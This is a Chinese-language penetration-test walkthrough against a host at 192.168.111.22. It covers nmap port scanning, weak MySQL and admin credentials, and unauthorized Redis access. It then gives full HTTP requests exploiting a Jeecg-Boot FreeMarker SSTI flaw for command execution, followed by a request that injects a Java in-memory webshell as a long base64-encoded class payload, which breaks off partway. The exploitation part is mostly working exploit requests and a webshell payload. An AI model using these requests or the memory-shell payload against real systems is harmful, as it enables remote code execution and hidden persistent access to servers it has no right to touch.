外网信息收集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| namp:
--min-rate 10000 10000速率来扫描
-p- 全端口
-p80,135 指定80,135端口扫描
-sU 指定udp扫描
-sT 指定tcp协议
-sV 扫描服务版本
-sC 默认脚本扫描
-O 对操作系统和版本探测
--script=vuln 进行基础漏洞扫描
nmap -p- --min-rate 10000 192.168.111.22
nmap -p- -sU --min-rate 10000 192.168.111.22
nmap -p22,3306,6379,18088,18080 --script=vuln 192.168.111.22
nmap -p22,3306,6379,18088,18080 -sV -sC -sT -O 192.168.111.22
|
根据扫描结果开放端口为 SSH(22)、MySQL(3306)、Redis(6379)、Apache Tomcat 404(18088)、http(18080)
外网漏洞探测
爆破 SSH(22)、MySQL(3306)、Redis(6379)
MySQL弱口令
192.168.111.22:3306 root/root
Redis未授权访问
192.168.111.22:6379
http://192.168.111.22:18088/ 访问 404 扫扫目录
Web 系统
http://192.168.111.22:18088/jeecg-boot/jmreport/list
http://192.168.111.22:18080/
外网漏洞利用
MySQL RCE(失败)
关于 mysql 知识点可以参考国光的MySQL 漏洞利用与提权
失效访问MySQL 漏洞利用与提权(转载)
show global variables like '%secure_file_priv%';
| Value |
说明 |
| NULL |
不允许导入或导出 |
| /tmp |
只允许在 /tmp 目录导入导出 |
| 空 |
不限制目录 |
Redis RCE(失败)
这里直接用GitHub - DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend(扩展版本)比较方便
知识点:Redis未授权利用总结
http://192.168.111.22:18080/
尝试上传,文件读取皆失败,存在弱口令但是页面未开发
弱口令
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST /admin/doLogin HTTP/1.1
Host: 192.168.111.22:18080
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
username=admin&password=123456
|
登录时发现存在Shiro 框架,爆破密钥失败
Jeecg-Boot 系统RCE(成功)
http://192.168.111.22:18088/jeecg-boot/jmreport/list
直接打 nday,因为这里的任意文件上传上传后需要登录,所以选择 SSTI 模板注入
GitHub - MInggongK/jeecg-: jeecg综合漏洞利用工具
queryFieldBySql SSTI模板注入
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 99
{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami \") }' "}
|
内存马GitHub - pen4uin/java-memshell-generator: 一款支持自定义的 Java 内存马生成工具|A customizable Java in-memory webshell generation tool.
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 16172
{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='yv66vgAAADEBewEAIGNoL3Fvcy9sb2diYWNrL3UvRW5jcnlwdGlvblV0aWxzBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEADGdldENsYXNzTmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAKGNoLnFvcy5sb2diYWNrLldoaXRlQmxhY2tMaXN0WHdlTGlzdGVuZXIIAAgBAA9nZXRCYXNlNjRTdHJpbmcBAApFeGNlcHRpb25zAQATamF2YS9pby9JT0V4Y2VwdGlvbgcADAEAEGphdmEvbGFuZy9TdHJpbmcHAA4BCpRINHNJQUFBQUFBQUFBSTFYK1hjVDF4WCtualh5eUxJSVFjUUdRVXZaUWlSWnNnSUJZdVJBc0kwZE81RUV3U3d4VHBleE5MWUVzbVJtUm1aSjI2UnQwalVwVFhlNnBrdnFMbWtMS2NnUUNpRnRDcWM1UGFmTkQvMG4rZy8wOUljMi9kNk1iRWxlT1FmbWpkNjc5M3YzZmZlNzk0M2YrOTlidHdCc3gxMkJZRG9iTzEwMFkvbmkySWlXUGhVN25zMVplbmVlcjRtY2FUMXpScGVEWHRBTkZVTGcvcFBhcEJiTGE0V3gyTUdSazNyYVV1RVMyQ3BuejhaTTNaak02MVpzMEJrUDY2ZEx1bWxWL2QwQ2pZL2xDamxybjRBckdEb21vUFFVTTdyQXlrU3VvS2RLNHlPNmNVUWJ5WFBHbnlpbXRmd3h6Y2pKMzVWSnhjcm1USUZ3NGw1RDd2UkJoY2NMQmZjeGRNT0o1d0QvRzhWemVrWmdXekN4Vk9TOWszckI2cFJ4cmpibkx3aHN1UWR2SHFXeTd3QVBudFB5dWZOeTU5VlZIbnZQcHZVSksxY3NxR2poR1RPYXBRazBESGNMTktmem1ta21pbHBHTndRQzltNnhBamM2ZWpqUlUxM2lIbzNqdXBVdEVuZGRvZ3BzNktONVppaVd0TmRvNVNiZStmTUNxMnFNYkJ5dXVkSjVVOUplWFJtMGpGeGhqRXNlUXpjbmlnV1RHWmpMVjlheUptTDlmTXdlM2JHa2wxbzV0c0JEeXpyWmh2VFp0Q3lmS2g0VWVQQ2U4RlE4eEF6Zlc3d3FRblhhZHM2dW9rMWd4YUJGWVNXMWlZb0lWNDNwVnYxR0FodURvU1dsUUIyMkkrYkZOandzMERwVzNiZlBLSTdQb2p5OVBMc08ydHpORnMyQ0R6dndpQmNOMkNuZ3plcFNMQ2x0WFBkaE56WTJjZnBSZ1NaRzA2ODdDcXVVUTEzNlEvT25mTmlEZURPQ1lNYWFIZFJqV3I1RTJMME9MTXZia3k0V0xDMVhvS2JXMTZMMlpEVmpVQjZqa05ZN1F5ZDgySTh1THlLZzJwVUpLdEdIQXc1R3I0Q1BvUjNTREFaczZZWVBUemliOW5OaFJEUDEzVHNQNkdtN2U3UXVGUFp3dHc5UDRpbDUrSVRBbWtWS1IwV0tjTFdMS2c3VktlRkkxdUFKVlJ5bUV0SWx3NkFHblNtQkI0SzE1RGl6Sk9jSWpub3hDSGFORmg2Z2h6em9aNjJldWtxdWM2eXRaQitld1pEMFBpRVFDZzdYVlh6bklqNmhZN0xMUGV2RlFYeVVleTVvcE9ManpGVkdIMldmdGFjOVlKTlpPY2RXUlZyRldrcThPai9BNk1lay95Z1RkR1RvVUs4UFdXeG93aGh5VGlrd0NYbk4wRFBKU2dQYXYwQXlodWYxbTlEaWJjcUhVOGg3a2NHNHdOckZyRlFVbVE5VHQ3clNhZDAwYzg3MUVEd2h1VGdOdzRzSm1ISml3Q0duNUdYQWsyeVR1Y0prOFJSTjk5Ukc2VnhrZFZGV3BrTHpwM3c0aTNNU24zMjB1YUNmR1NpWWxrWXh6NVhEclBrbjhTbDVtazl6ZCtwZWsxMjJaWUhkWlMyOGdNL0l1K3F6UkI3Tmw4eHNkMmwwVkNyL1JYaWFFY1pMTE9MWnk0SVozTUtPemd6MFVXa2RDeUF1WGN1ejhYMEpYNVpGOGhVUE5nbHNxQnFraW9PbGRMWXZwK2N6TlRmVVY4bnFwR2JzWXM5TExHM2I2VmcrWEgrcFZMWjExclk3dzQ3WnU2MHUwelpjeGZLUm1SS2ViNkhpdTJ3M3N0S2tzbml6emk4dW52SjcrTDZrOWdlczdSclIyZ0FDMFdYNlhuMUVQdndJUDVZcGZZMFNsSmRCYVVJMzdKdmFoNS9LYlRMNDJad2N6MkRhWW56ZGl3djRoUmNYcFVSZEJKalRlSmZTM3Evd2ErbjRHMTZ2R2J2N3NadTAxQmpXc3UvaVp3NmJvMWtxdEkvbnpIUjdkOWRnNzB6VE5EeTRSSXpSb24wZjhFWmRob0VaR3QvRUgrVDVyckJwT3ZzN0V2V2c3TndrVG5YNmNNMHA0ZXVWVnRwZXNuTDU5bTY3YTN0d2d6cDJrdUJFY3BPbDRhQjU4TGI4eXVNZDU4RTd0RHJLR3k3YU5jYWU2OEdmYWRXZHpZMXJaeno0Q3paUnNnbzRCUmVmdkRQNE9Tdmt0V2FQZSsyeGtXLzgvT096aWIrNjZDRTRyZ2xQWTJYWS82ZXI2QXY3MzcyS2pyRC96bFU4ZnBsTERmQlczQUFmbXUybjdjSnhoUTE4UDFaVjRIYlo5cHliNitpM0hWdWR4WXFqZlBOak5aOXNFek1RNGwzR0pxSGVieXRqKzIwRWsrSElOSGFsSXVFcjZMaU94eHB3QjFlcVAvanllQms5Ri9HYW5PdTdqb0VHeEpXQWNnY1h3Z0dsakdUY2ZRTUhoMXczOGZRMUhDOWplQm9maXpmNlArRWZhYnlKekpETHJ3OE9LVy9pNU9DUVd6N0xLTVRWZ0VwSEs2QUdHbW1qRExrQ2J0cmN3TmlRYXhwbmFDaGZBKzViOGtjWno5MUdKdTRKZU1wNDNtMWJSMmdjNWNMbmprZXY0L01DVTNESDNWTlFVcGQ1K1AyNGkvZElnd2Qvdzk4NXVteUsrbmg0b0lXemEzQWYxaUtHQURxeGp0WWZRajgrakdGc3dEbDhCTTh6Z1c4d3llOWdNM0cyRW1rTGNVSkVDdUlmYklXUzRtZEpYajh0MXhESFRjODhzZFl4Q2VlUXducmlxVVJZVDh3TjNLMFRyeEoxby94REFMZUl1NW54a1BqWjlMeGZTWThIZitWT1d4bC9sTE5ib0h6QXJkMHFHbFJzVXhGVUVWYjVzU0pVdFA0SG9wdUR6RDIvc2ZqOEFoMmtJbHZ0blBaenhzMHhJcEp0L2k5ZXc4ditWL2k0alhCeUNvRlVXODB2VDF5Wmdvdi9JcGZvMDBDQ0hpQkdDOFBkTE9GNVdIWm96a3ZVZnpKc2lkb2hrdUV5ZnBpSytwWFgwUnFsZm41Q3BCVnhKVnJHejFOVEgvd3JjaGUrRzdndzFEYU5xYmNqVFBJdkkzUjQ0eExqVzhHRHRySURPUW5aUVFya0g0THlGQ3AyY25VMzF4K2xSUWRwM1VQNjRxUnRMeW5aUjByMjA2ckxKbjhuNDVDMGY0M0VLaklpZkIzZnNLbnN3RGZwd2I5Z2lQUXRmSnVqU3Z6dk1BMHVtOVJWVVA0TFZjVkZGWm1VaWd0TnZocnFoUHhtcXh6MjM4eWxQS3pwdjN3TlY1TVIvN1RpQ0RsQ3piMFZvUXdWVzRadGpqWjE1OStscFArUE5DYzF0MWdLR1ZvS2ptVGdPVmtzSk0xL3V4WW1vQ3dJWWxkeWxCL3RNOEtWd2dJL1FSdVoyWFlNVUxoUHNnVTh4YmVFemNjK3JqUlNuRkp1RFZ6Wlo3KzV1QjdHYjhtTVFvOERaT3QzZGw4d1o0Vm40dmMyVzFHbmZ4U2twS3AwNFAvcnNZUXdxUThBQUE9PQgAEAEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAEgATCgAPABQBAAMoKVYBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAXAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAIbGlzdGVuZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdjb250ZXh0AQAIY29udGV4dHMBABBMamF2YS91dGlsL0xpc3Q7AQAEdGhpcwEAIkxjaC9xb3MvbG9nYmFjay91L0VuY3J5cHRpb25VdGlsczsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQAkTGphdmEvdXRpbC9MaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAOamF2YS91dGlsL0xpc3QHACQBABJqYXZhL3V0aWwvSXRlcmF0b3IHACYBAA1TdGFja01hcFRhYmxlDAASABYKAAQAKQEACmdldENvbnRleHQBABIoKUxqYXZhL3V0aWwvTGlzdDsMACsALAoAAgAtAQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7DAAvADALACUAMQEAB2hhc05leHQBAAMoKVoMADMANAsAJwA1AQAEbmV4dAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAA3ADgLACcAOQEAC2dldExpc3RlbmVyAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMADsAPAoAAgA9AQALYWRkTGlzdGVuZXIBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYMAD8AQAoAAgBBAQAEa2V5MQEACGNoaWxkcmVuAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAA2tleQEAC2NoaWxkcmVuTWFwAQAGdGhyZWFkAQASTGphdmEvbGFuZy9UaHJlYWQ7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3RocmVhZHMBABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBNAQAQamF2YS9sYW5nL1RocmVhZAcATwEAEWphdmEvdXRpbC9IYXNoTWFwBwBRAQATamF2YS91dGlsL0FycmF5TGlzdAcAUwoAVAApAQAKZ2V0VGhyZWFkcwgAVgEADGludm9rZU1ldGhvZAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7DABYAFkKAAIAWgEAB2dldE5hbWUMAFwABgoAUABdAQAcQ29udGFpbmVyQmFja2dyb3VuZFByb2Nlc3NvcggAXwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDABhAGIKAA8AYwEABnRhcmdldAgAZQEABWdldEZWDABnAFkKAAIAaAEABnRoaXMkMAgAaggARAEABmtleVNldAEAESgpTGphdmEvdXRpbC9TZXQ7DABtAG4KAFIAbwEADWphdmEvdXRpbC9TZXQHAHELAHIAMQEAA2dldAwAdAA8CgBSAHUBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMAHcAeAoABAB5AQAPamF2YS9sYW5nL0NsYXNzBwB7CgB8AF0BAA9TdGFuZGFyZENvbnRleHQIAH4BAANhZGQBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoMAIAAgQsAJQCCAQAVVG9tY2F0RW1iZWRkZWRDb250ZXh0CACEAQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwAhgCHCgBQAIgBAAh0b1N0cmluZwwAigAGCgB8AIsBABlQYXJhbGxlbFdlYmFwcENsYXNzTG9hZGVyCACNAQAfVG9tY2F0RW1iZWRkZWRXZWJhcHBDbGFzc0xvYWRlcggAjwEACXJlc291cmNlcwgAkQgAHQEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uBwCUAQAYKExqYXZhL2xhbmcvVGhyb3dhYmxlOylWDAASAJYKAJUAlwEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uBwCZAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgcAmwEAK2phdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25UYXJnZXRFeGNlcHRpb24HAJ0BAAlTaWduYXR1cmUBACYoKUxqYXZhL3V0aWwvTGlzdDxMamF2YS9sYW5nL09iamVjdDs+OwEAE2phdmEvbGFuZy9UaHJvd2FibGUHAKEBAAljbGF6ekJ5dGUBAAJbQgEAC2RlZmluZUNsYXNzAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAVjbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQALY2xhc3NMb2FkZXIBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAqwEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwArQCuCgBQAK8BAA5nZXRDbGFzc0xvYWRlcgwAsQCHCgB8ALIMAAUABgoAAgC0AQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwwAtgC3CgCsALgBAAtuZXdJbnN0YW5jZQwAugA4CgB8ALsMAAoABgoAAgC9AQAMZGVjb2RlQmFzZTY0AQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgwAvwDACgACAMEBAA5nemlwRGVjb21wcmVzcwEABihbQilbQgwAwwDECgACAMUIAKUHAKQBABFqYXZhL2xhbmcvSW50ZWdlcgcAyQEABFRZUEUMAMsAqAkAygDMAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DADOAM8KAHwA0AEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAcA0gEADXNldEFjY2Vzc2libGUBAAQoWilWDADUANUKANMA1gEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7DADYANkKAMoA2gEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwA3ADdCgDTAN4BAAdvYmplY3RzAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEACWxpc3RlbmVycwEACWFycmF5TGlzdAEAFUxqYXZhL3V0aWwvQXJyYXlMaXN0OwEACmlzSW5qZWN0ZWQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KVoMAOUA5goAAgDnAQAbYWRkQXBwbGljYXRpb25FdmVudExpc3RlbmVyCADpAQBdKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzO1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABYAOsKAAIA7AEAHGdldEFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcnMIAO4HAOEBABBqYXZhL3V0aWwvQXJyYXlzBwDxAQAGYXNMaXN0AQAlKFtMamF2YS9sYW5nL09iamVjdDspTGphdmEvdXRpbC9MaXN0OwwA8wD0CgDyAPUBABkoTGphdmEvdXRpbC9Db2xsZWN0aW9uOylWDAASAPcKAFQA+AoAVACCAQAcc2V0QXBwbGljYXRpb25FdmVudExpc3RlbmVycwgA+wEAB3RvQXJyYXkBABUoKVtMamF2YS9sYW5nL09iamVjdDsMAP0A/goAVAD/AQABaQEAAUkBAA1ldmlsQ2xhc3NOYW1lAQASTGphdmEvbGFuZy9TdHJpbmc7AQAEc2l6ZQEAAygpSQwBBQEGCgBUAQcBABUoSSlMamF2YS9sYW5nL09iamVjdDsMAHQBCQoAVAEKAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEAB2lnbm9yZWQBAAliYXNlNjRTdHIBABRMamF2YS9sYW5nL0NsYXNzPCo+OwEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIIAREBAAdmb3JOYW1lDAETALcKAHwBFAEADGRlY29kZUJ1ZmZlcggBFgEACWdldE1ldGhvZAwBGADPCgB8ARkBABBqYXZhLnV0aWwuQmFzZTY0CAEbAQAKZ2V0RGVjb2RlcggBHQEABmRlY29kZQgBHwEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwEhAQAOY29tcHJlc3NlZERhdGEBAANvdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQACaW4BAB5MamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbTsBAAZ1bmd6aXABAB9MamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW07AQAGYnVmZmVyAQABbgEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwEsAQAcamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbQcBLgEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtBwEwCgEtACkBAAUoW0IpVgwAEgEzCgEvATQBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMABIBNgoBMQE3AQAEcmVhZAEABShbQilJDAE5AToKATEBOwEABXdyaXRlAQAHKFtCSUkpVgwBPQE+CgEtAT8BAAt0b0J5dGVBcnJheQEABCgpW0IMAUEBQgoBLQFDAQADb2JqAQAJZmllbGROYW1lAQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAEZ2V0RgEAPyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBSQFKCgACAUsBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcBTQoBTgDWCgFOAHUBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HAVEBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAVQBVQoAfAFWAQANZ2V0U3VwZXJjbGFzcwwBWAB4CgB8AVkKAVIAFAEADHRhcmdldE9iamVjdAEACm1ldGhvZE5hbWUBAAdtZXRob2RzAQAbW0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRo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